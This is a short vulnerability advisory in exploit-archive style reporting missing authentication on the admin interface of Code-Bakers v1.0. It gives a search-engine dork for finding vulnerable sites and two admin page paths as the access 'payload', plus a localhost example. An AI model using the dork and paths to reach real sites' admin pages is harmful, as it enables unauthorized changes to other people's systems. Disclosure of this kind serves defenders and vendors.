Code-Bakers version 1.0 appears to be missing authentication on the administrative interface.
37decde4e6e8203ecc07eae2804c9e5a9355e2f8ad34bd2e1301db2e84180c92
====================================================================================================================================
| # Title : Code-Bakers v1.0 Unauthorized administrative access Vulnerability |
| # Author : indoushka |
| # Tested on : windows 10 Français V.(Pro) / browser : Mozilla firefox 102.0.1(64-bit) |
| # Vendor : https://www.codebakers.co.uk/ |
| # Dork : "dishes.php?res_id=" |
====================================================================================================================================
poc :
[+] Dorking İn Google Or Other Search Enggine.
[+] Unauthorized administrative access possible to act and modify anything.
[+] Use payload : /admin/update_menu.php or /admin/add_users.php
[+] https://127.0.0.1/foodiejunction.store/admin/update_menu.php
Greetings to :=========================================================================================================================
|
jericho * Larry W. Cashdollar * brutelogic* hyp3rlinx* 9aylas * shadow_00715 * LiquidWorm* moncet |
|
=======================================================================================================================================